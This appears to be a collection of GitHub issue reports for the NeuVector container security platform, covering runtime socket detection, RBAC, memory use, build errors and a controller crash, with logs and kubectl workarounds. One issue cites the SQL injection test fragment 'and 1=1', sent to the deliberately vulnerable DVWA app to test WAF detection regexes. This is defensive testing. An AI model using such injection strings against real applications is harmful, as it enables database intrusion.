It looks like, from the code, that it may be failing the check for a UNIX socket: with Podman, /var/run/docker.sock is a symbolic link, and the current code checks (via UNIX stat) that the path is a socket file. A stat of the file on the filesystem shows a symbolic link:

stat /var/run/docker.sock
File: /var/run/docker.sock -> /run/podman/podman.sock
Size: 23 Blocks: 0 IO Block: 4096 symbolic link
Device: 1ch/28d Inode: 940 Links: 1
Access: (0777/lrwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Context: system_u:object_r:var_run_t:s0
Access: 2022-04-01 21:15:04.101455929 -0400
Modify: 2022-04-01 19:41:05.180000001 -0400
Change: 2022-04-01 19:41:05.180000001 -0400
Birth: -

stat /run/podman/podman.sock
File: /run/podman/podman.sock
Size: 0 Blocks: 0 IO Block: 4096 socket
Device: 1ch/28d Inode: 971 Links: 1
Access: (0660/srw-rw----) Uid: ( 0/ root) Gid: ( 0/ root)
Context: system_u:object_r:var_run_t:s0
Access: 2022-04-01 20:22:15.932986012 -0400
Modify: 2022-04-01 19:41:05.230000001 -0400
Change: 2022-04-01 19:41:05.230000001 -0400
Birth: -

Switching the mount point in the init config does not seem to resolve it:

- name: docker-sock
  hostPath:
    path: /run/podman/podman.sock
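
A quick way to see what the agent's socket check would observe (a sketch; GNU stat's %F prints the file type, and -L follows symlinks):

stat -c %F /var/run/docker.sock      # -> symbolic link (what an lstat-style check sees)
stat -L -c %F /var/run/docker.sock   # -> socket (when the link is followed)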

To Reproduce
Steps to reproduce the behavior:

Spin up a KinD cluster under Podman. Apply the NeuVector config as if for the Docker container runtime. The controller and enforcer fail to start and remain in CrashLoopBackOff.

Expected behavior
Pods come up successfully.


LDAP/AD Authenticated Users Unable to Give Namespaced Access to Role

We want to run NeuVector on a multi-tenant Kubernetes cluster, using Active Directory to authenticate users and to construct a specific role that gives them read access to runtime scanning of objects only in their namespace.

This is possible if we manually create a user using the web ui:
Screenshot 2022-02-18 at 11 14 56

If a user is created via the AD integration, no such option is available; we are only permitted to set a Global role:

Screenshot 2022-02-18 at 11 17 00

allinone on k3s: Cannot find container runtime socket

The allinone pod fails to fully start: Running 0/1.

NeuVector 5.0.0-preview
k3s v1.22.6+k3s1

Runtime location:
ll /run/k3s/containerd/containerd.sock
srw-rw---- 1 root root 0 Feb 8 00:06 /run/k3s/containerd/containerd.sock

yaml configuration:
grep .sock neuvector.yaml

    - mountPath: /run/k3s/containerd/containerd.sock
      name: runtime-sock
    - name: runtime-sock
      path: /run/k3s/containerd/containerd.sock
    - mountPath: /run/k3s/containerd/containerd.sock
      name: runtime-sock
    - name: runtime-sock
      path: /run/k3s/containerd/containerd.sock
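
A quick sanity check, as a sketch: confirm the socket actually appears inside the pod at the mounted path and is a socket rather than an empty directory created by the hostPath mount:

kubectl exec -n neuvector neuvector-allinone-pod-gfqrh -- ls -l /run/k3s/containerd/containerd.sock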

Full pod describe:

Name:         neuvector-allinone-pod-gfqrh
Namespace:    neuvector
Priority:     0
Node:         control01/172.30.0.21
Start Time:   Tue, 08 Feb 2022 00:16:03 -0700
Labels:       app=neuvector-allinone-pod
              controller-revision-hash=6bd8989db5
              pod-template-generation=1
Annotations:  <none>
Status:       Running
IP:           10.42.0.24
IPs:
  IP:           10.42.0.24
Controlled By:  DaemonSet/neuvector-allinone-pod
Containers:
  neuvector-allinone-pod:
    Container ID:   containerd://8e39e0b008d4b2f13f79ad164c6174dc940941d073923349056ca304cea6f812
    Image:          neuvector/allinone.preview:5.0.0-preview.1
    Image ID:       docker.io/neuvector/allinone.preview@sha256:f288c606767616fc0c5e5081c45300e14173bbedc960e4b54acbeae513a4bc64
    Port:           <none>
    Host Port:      <none>
    State:          Running
      Started:      Tue, 08 Feb 2022 00:16:04 -0700
    Ready:          False
    Restart Count:  0
    Readiness:      exec [cat /tmp/ready] delay=5s timeout=1s period=5s #success=1 #failure=3
    Environment:
      CLUSTER_JOIN_ADDR:        neuvector-svc-allinone.neuvector
      CLUSTER_ADVERTISED_ADDR:   (v1:status.podIP)
      CLUSTER_BIND_ADDR:         (v1:status.podIP)
    Mounts:
      /etc/config from config-volume (ro)
      /host/cgroup from cgroup-vol (ro)
      /host/proc from proc-vol (ro)
      /lib/modules from modules-vol (ro)
      /run/k3s/containerd/containerd.sock from runtime-sock (ro)
      /var/neuvector from nv-share (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-94rjd (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             False 
  ContainersReady   False 
  PodScheduled      True 
Volumes:
  modules-vol:
    Type:          HostPath (bare host directory volume)
    Path:          /lib/modules
    HostPathType:  
  nv-share:
    Type:          HostPath (bare host directory volume)
    Path:          /var/neuvector
    HostPathType:  
  runtime-sock:
    Type:          HostPath (bare host directory volume)
    Path:          /run/k3s/containerd/containerd.sock
    HostPathType:  
  proc-vol:
    Type:          HostPath (bare host directory volume)
    Path:          /proc
    HostPathType:  
  cgroup-vol:
    Type:          HostPath (bare host directory volume)
    Path:          /sys/fs/cgroup
    HostPathType:  
  config-volume:
    Type:      ConfigMap (a volume populated by a ConfigMap)
    Name:      neuvector-init
    Optional:  true
  kube-api-access-94rjd:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   BestEffort
Node-Selectors:              nvallinone=true
Tolerations:                 node.kubernetes.io/disk-pressure:NoSchedule op=Exists
                             node.kubernetes.io/memory-pressure:NoSchedule op=Exists
                             node.kubernetes.io/not-ready:NoExecute op=Exists
                             node.kubernetes.io/pid-pressure:NoSchedule op=Exists
                             node.kubernetes.io/unreachable:NoExecute op=Exists
                             node.kubernetes.io/unschedulable:NoSchedule op=Exists
Events:
  Type     Reason     Age                    From               Message
  ----     ------     ----                   ----               -------
  Normal   Scheduled  17m                    default-scheduler  Successfully assigned neuvector/neuvector-allinone-pod-gfqrh to control01
  Normal   Pulled     17m                    kubelet            Container image "neuvector/allinone.preview:5.0.0-preview.1" already present on machine
  Normal   Created    17m                    kubelet            Created container neuvector-allinone-pod
  Normal   Started    17m                    kubelet            Started container neuvector-allinone-pod
  Warning  Unhealthy  2m19s (x192 over 17m)  kubelet            Readiness probe failed: cat: can't open '/tmp/ready': No such file or directory

Full pod log:

2022-02-08 07:16:05,177 CRIT Supervisor is running as root.  Privileges were not dropped because no user is specified in the config file.  If you intend to run as root, you can set user=root in the config file to avoid this message.
2022-02-08 07:16:05,179 INFO supervisord started with pid 12696
2022-02-08 07:16:06,184 INFO spawned: 'manager' with pid 12920
2022-02-08 07:16:06,189 INFO spawned: 'monitor' with pid 12921
2022-02-08 07:16:06,202 DEBG 'monitor' stdout output:
2022-02-08T07:16:06|MON|/usr/local/bin/monitor starts, pid=12921

2022-02-08 07:16:06,205 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:06,207 DEBG 'monitor' stdout output:
Cannot find container runtime socket

2022-02-08 07:16:06,207 DEBG 'monitor' stdout output:
2022-02-08T07:16:06|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:06,208 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425664 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:06,208 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:06,208 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:07,210 INFO success: manager entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2022-02-08 07:16:07,211 INFO spawned: 'monitor' with pid 12986
2022-02-08 07:16:07,215 DEBG 'monitor' stdout output:
2022-02-08T07:16:07|MON|/usr/local/bin/monitor starts, pid=12986

2022-02-08 07:16:07,216 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:07,218 DEBG 'monitor' stdout output:
Cannot find container runtime socket

2022-02-08 07:16:07,218 DEBG 'monitor' stdout output:
2022-02-08T07:16:07|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:07,218 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425712 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:07,218 DEBG fd 9 closed, stopped monitoring <POutputDispatcher at 140170418425664 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stdout)>
2022-02-08 07:16:07,218 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:07,218 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:07,229 DEBG 'manager' stdout output:
2022-02-08 07:16:07,227|INFO |MANAGER|com.neu.web.Rest$(sslContext:32): Import manager's certificate and private key to manager's keystore

2022-02-08 07:16:07,235 DEBG 'manager' stdout output:
2022-02-08 07:16:07,234|INFO |MANAGER|com.neu.web.Rest$(sslContext:54): PKCS#8 private key is being used

2022-02-08 07:16:08,710 DEBG 'manager' stdout output:
2022-02-08 07:16:08,708|INFO |MANAGER|akka.actor.DeadLetterActorRef(apply$mcV$sp:74): Message [akka.io.Tcp$Bound] from Actor[akka://manager-system/user/IO-HTTP/listener-0#540477287] to Actor[akka://manager-system/deadLetters] was not delivered. [1] dead letters encountered. This logging can be turned off or adjusted with configuration settings 'akka.log-dead-letters' and 'akka.log-dead-letters-during-shutdown'.

2022-02-08 07:16:09,715 INFO spawned: 'monitor' with pid 13028
2022-02-08 07:16:09,728 DEBG 'monitor' stdout output:
2022-02-08T07:16:09|MON|/usr/local/bin/monitor starts, pid=13028

2022-02-08 07:16:09,730 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:09,733 DEBG 'monitor' stdout output:
Cannot find container runtime socket

2022-02-08 07:16:09,733 DEBG 'monitor' stdout output:
2022-02-08T07:16:09|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:09,733 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425520 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:09,734 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:09,734 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:12,742 INFO spawned: 'monitor' with pid 13045
2022-02-08 07:16:12,757 DEBG 'monitor' stdout output:
2022-02-08T07:16:12|MON|/usr/local/bin/monitor starts, pid=13045

2022-02-08 07:16:12,763 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:12,766 DEBG 'monitor' stdout output:
Cannot find container runtime socket
2022-02-08T07:16:12|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:12,766 DEBG fd 9 closed, stopped monitoring <POutputDispatcher at 140170418425520 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stdout)>
2022-02-08 07:16:12,767 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425568 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:12,767 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:12,767 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:12,768 INFO gave up: monitor entered FATAL state, too many start retries too quickly

memory usage too high

Environment
Platform: Kubernetes (Alibaba Cloud)
Kubernetes/Platform Version(s): 1.20.4-aliyun.1

Describe the bug

image

memory usage too high

To Reproduce
Steps to reproduce the behavior:

2022-04-07T10:36:44.15 |INFO|AGT|main.(*Bench).doContainerCustomCheck: Running benchmark checks done
2022-04-07T10:37:07|DEBU|dp0|dp_data_thr: epoll error: /host/proc/3631255/ns/net-eth0
2022-04-07T10:37:20.452|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp: no such file or directory
2022-04-07T10:37:20.452|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp6: no such file or directory
2022-04-07T10:37:20.452|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp: no such file or directory
2022-04-07T10:37:20.453|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp6: no such file or directory
2022-04-07T10:37:47.541|ERRO|AGT|main.updateContainerNetworks: Error reading container network endpint - container=lb-none endpoint=none-endpoint error=Not found
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/tcp: no such file or directory
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/tcp6: no such file or directory
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/udp: no such file or directory
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/udp6: no such file or directory
2022-04-07T10:38:08.194|INFO|AGT|main.taskAddContainer: - id=ae98a232623f98f38c5df29b3a9f44a8382b70f3d7a3edda4367ee56046489e0 name=b9555b6dd-zjp78_871538d8-8e9b-449a-8255-6d7e530bcca3_0
2022-04-07T10:38:20.718|INFO|AGT|main.(*Bench).doDockerContainerBench: Running benchmark checks done
2022-04-07T10:38:20.725|INFO|AGT|main.(*Bench).doContainerCustomCheck: Running benchmark checks done
2022-04-07T10:38:22.663|INFO|AGT|main.(*TaskScanner).scanSecretLoop: SCRT: in progress ...
2022-04-07T10:38:35.739|INFO|AGT|system.(*SystemTools).CGroupMemoryStatReset: - threshold=2080374784 usage=4770603008
2022-04-07T10:38:35.739|ERRO|AGT|system.(*SystemTools).CGroupMemoryStatReset.func1: - err=write /sys/fs/cgroup/memory/memory.force_empty: device or resource busy
2022-04-07T10:38:36.663|INFO|AGT|main.(*TaskScanner).scanSecretLoop: SCRT: done - Finished=1 TimeUsed=13.999985626s
2022-04-07T10:39:44.852|INFO|AGT|main.taskStopContainer: - c.pid=3632603 container=3ffa5f5f4db8eb3550cb757b0df154b3c0dda18b2af5d44b0f7e335edd75e401 pid=0
2022-04-07T10:39:44.853|ERRO|AGT|main.taskStopContainer: Failed to read container. Use cached info. - error=No such container: 3ffa5f5f4db8eb3550cb757b0df154b3c0dda18b2af5d44b0f7e335edd75e401
 id=3ffa5f5f4db8eb3550cb757b0df154b3c0dda18b2af5d44b0f7e335edd75e401
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp: no such file or directory
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp6: no such file or directory
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp: no such file or directory
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp6: no such file or directory
2022-04-07T10:39:46.071|INFO|AGT|main.taskStopContainer: - c.pid=3631255 container=f59b29c5c55b7d011f102b050867f2a072357495dbadc9cc419855b47d2eed83 pid=0
2022-04-07T10:39:46.071|ERRO|AGT|main.taskStopContainer: Failed to read container. Use cached info. - error=No such container: f59b29c5c55b7d011f102b050867f2a072357495dbadc9cc419855b47d2eed83
 id=f59b29c5c55b7d011f102b050867f2a072357495dbadc9cc419855b47d2eed83
2022-04-07T10:39:56.127|INFO|AGT|main.(*Bench).doDockerContainerBench: Running benchmark checks done
2022-04-07T10:39:56.13 |INFO|AGT|main.(*Bench).doContainerCustomCheck: Running benchmark checks done


NeuVector images built for Apple arm64

Is your feature request related to a problem? Please describe.
linux/arm64 images would allow local development and testing of NeuVector on the Apple M1 line of laptops and desktops (the Mac Studio, for instance, offers plenty of capacity).

Describe the solution you'd like
Publish an arm64 image to Docker Hub, or expose the build system so others can build locally.

Describe alternatives you've considered
I have put in a support ticket through our commercial license, and this is being considered by the Product Team. Open-sourcing the build tools might allow this to happen faster.

Additional context
Not expecting this to be a production-supported configuration, but local K8s development (KinD on Podman) offers a reasonable setup for local testing.

dp directory compilation makefile error:

Hello, in my CentOS environment, compiling with the makefile in the dp directory fails with:
'struct tcphdr' has no member named 'th_seq'
Have you ever encountered this problem? Is there a solution? Thank you very much!
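
A possible lead (an assumption, not verified against NeuVector's dp build): glibc's netinet/tcp.h only exposes the BSD-style member names (th_seq, th_ack, ...) when the BSD-flavored struct layout is enabled, which older glibc (e.g. CentOS 7) guards behind feature macros such as __FAVOR_BSD:

# see which feature macro your header guards the BSD names behind
grep -n -B2 "th_seq" /usr/include/netinet/tcp.h
# then try the build with the matching defines (may need wiring into dp's Makefile)
make CFLAGS="-D_BSD_SOURCE -D__FAVOR_BSD"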

WAF sensors cannot match the rule

Environment
Platform: K8s
Kubernetes/Platform Version(s): v1.19.1
Neuvector Version: preview-3

Describe the bug
I'm not sure if this is a bug; maybe it is a configuration issue on my side.
I have configured a regex for a WAF sensor, like this:
image
We can see that "and 1=1" is matched by the regex.

Then I add this policy to the dvwa group:
image

Then I access DVWA and test it, but the payload does not match the WAF rule.
image
I want to know why; can someone tell me the reason or the principle? Many regexes taken from Imperva WAF signatures fail to match in NeuVector's WAF sensors.
The regexes come from Imperva WAF signatures, and Imperva WAF does match them.

Thanks!

The API document of NeuVector

Is your feature request related to a problem? Please describe.
The source code of the REST API shows the usage of each request, but I can't find the corresponding HTTP requests on the front end, so it's hard for me to understand the real purpose of each request.
Describe the solution you'd like
Where is the API document I can refer to?

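In the meantime, a minimal sketch of calling the REST API directly (the /v1/auth endpoint shape is inferred from NeuVector's REST source under controller/rest/; treat the exact payload fields as assumptions to verify there):

# log in and obtain a session token from the controller REST port (10443)
curl -sk -H "Content-Type: application/json" \
  -d '{"password":{"username":"admin","password":"admin"}}' \
  https://<controller-ip>:10443/v1/auth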

RBAC error preview 3

Environment
Platform: AWS EC2
Kubernetes/Platform Version(s): k3s 1.23.4

Describe the bug
Kubernetes clusterrole "neuvector-binding-nvdlpsecurityrules" is required to grant delete,list permission(s) on nvdlpsecurityrules resource(s).

Cannot find Kubernetes clusterrolebinding "neuvector-binding-nvdlpsecurityrules"(kubernetes api: Failure 404 clusterrolebindings.rbac.authorization.k8s.io "neuvector-binding-nvdlpsecurityrules" not found).

To Reproduce
Steps to reproduce the behavior:

  1. Install via helm
  2. login

Expected behavior
No errors appear

Workaround (provided by FM)
Resolved by applying the DLP CRD YAML:
kubectl apply -f https://raw.githubusercontent.com/neuvector/manifests/main/kubernetes/5.0.0/dlp-crd-k8s-1.19.yaml

Create the ClusterRole:
kubectl create clusterrole neuvector-binding-nvdlpsecurityrules --verb=list,delete --resource=nvdlpsecurityrules

Then create the ClusterRoleBinding with:
kubectl create clusterrolebinding neuvector-binding-nvdlpsecurityrules --clusterrole=neuvector-binding-nvdlpsecurityrules --serviceaccount=neuvector-system:default

k8s install reports it cannot connect to port 8500

2022-02-23T06:45:04|MON|/usr/local/bin/monitor starts, pid=1
2022-02-23T06:45:04|MON|Start ctrl, pid=7
2022-02-23T06:45:04.678|INFO|CTL|main.main: START - version=v5.0.0-preview.1
2022-02-23T06:45:04.678|INFO|CTL|main.main: - join=neuvector-svc-controller.neuvector
2022-02-23T06:45:04.678|INFO|CTL|main.main: - advertise=10.244.1.76
2022-02-23T06:45:04.678|INFO|CTL|main.main: - bind=10.244.1.76
2022-02-23T06:45:04.681|INFO|CTL|system.NewSystemTools: cgroup v1
2022-02-23T06:45:04.681|INFO|CTL|container.Connect: - endpoint=
2022-02-23T06:45:04.681|WARN|CTL|container.parseEndpointWithFallbackProtocol: no error unix /run/containerd/containerd.sock.
2022-02-23T06:45:04.682|ERRO|CTL|container.containerdConnect: cri info - error=rpc error: code = Unimplemented desc = unknown service runtime.v1alpha2.RuntimeService
2022-02-23T06:45:04.682|INFO|CTL|container.containerdConnect: containerd connected - endpoint=/run/containerd/containerd.sock version={Version:1.4.12 Revision:7b11cfaabd73bb80907dd23182b9347b4245eb5d}
2022-02-23T06:45:04.713|ERRO|CTL|global.getVersion: - code=403 tag=oc
2022-02-23T06:45:04.728|ERRO|CTL|global.getVersion: - code=403 tag=oc
2022-02-23T06:45:04.728|INFO|CTL|main.main: Container socket connected - endpoint= runtime=containerd
2022-02-23T06:45:04.728|INFO|CTL|main.main: - k8s=1.23.3 oc=
2022-02-23T06:45:04.728|ERRO|CTL|container.(*containerdDriver).GetContainer: Failed to get container - error=container "6dd53049065f54334497ebbe7bc888c30c5ddd4c26cdbd2e61a6291fd17b9b35" in namespace "k8s.io": not found
2022-02-23T06:45:04.728|ERRO|CTL|main.main: Failed to get local device information - error=not found
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.init
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/errors.go:41
runtime.doInit
/usr/local/go/src/runtime/proc.go:5480
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.main
/usr/local/go/src/runtime/proc.go:190
runtime.goexit
/usr/local/go/src/runtime/asm_amd64.s:1373
container "6dd53049065f54334497ebbe7bc888c30c5ddd4c26cdbd2e61a6291fd17b9b35" in namespace "k8s.io"
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.FromGRPC
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/grpc.go:98
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*remoteContainers).Get
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/containerstore.go:50
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*Client).LoadContainer
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/client.go:248
github.com/neuvector/neuvector/share/container.(*containerdDriver).GetContainer
/go/src/github.com/neuvector/neuvector/share/container/containerd.go:294
github.com/neuvector/neuvector/share/container.getDevice
/go/src/github.com/neuvector/neuvector/share/container/common.go:191
github.com/neuvector/neuvector/share/container.(*containerdDriver).GetDevice
/go/src/github.com/neuvector/neuvector/share/container/containerd.go:121
main.getLocalInfo
/go/src/github.com/neuvector/neuvector/controller/controller.go:91
main.main
/go/src/github.com/neuvector/neuvector/controller/controller.go:325
runtime.main
/usr/local/go/src/runtime/proc.go:203
runtime.goexit
/usr/local/go/src/runtime/asm_amd64.s:1373
2022-02-23T06:45:04|MON|Process ctrl exit status 254, pid=7
2022-02-23T06:45:04|MON|Process ctrl exit with non-recoverable return code. Monitor Exit!!
Leave the cluster
Error leaving: Put http://127.0.0.1:8500/v1/agent/leave: dial tcp 127.0.0.1:8500: connect: connection refused
2022-02-23T06:45:04|MON|Clean up.
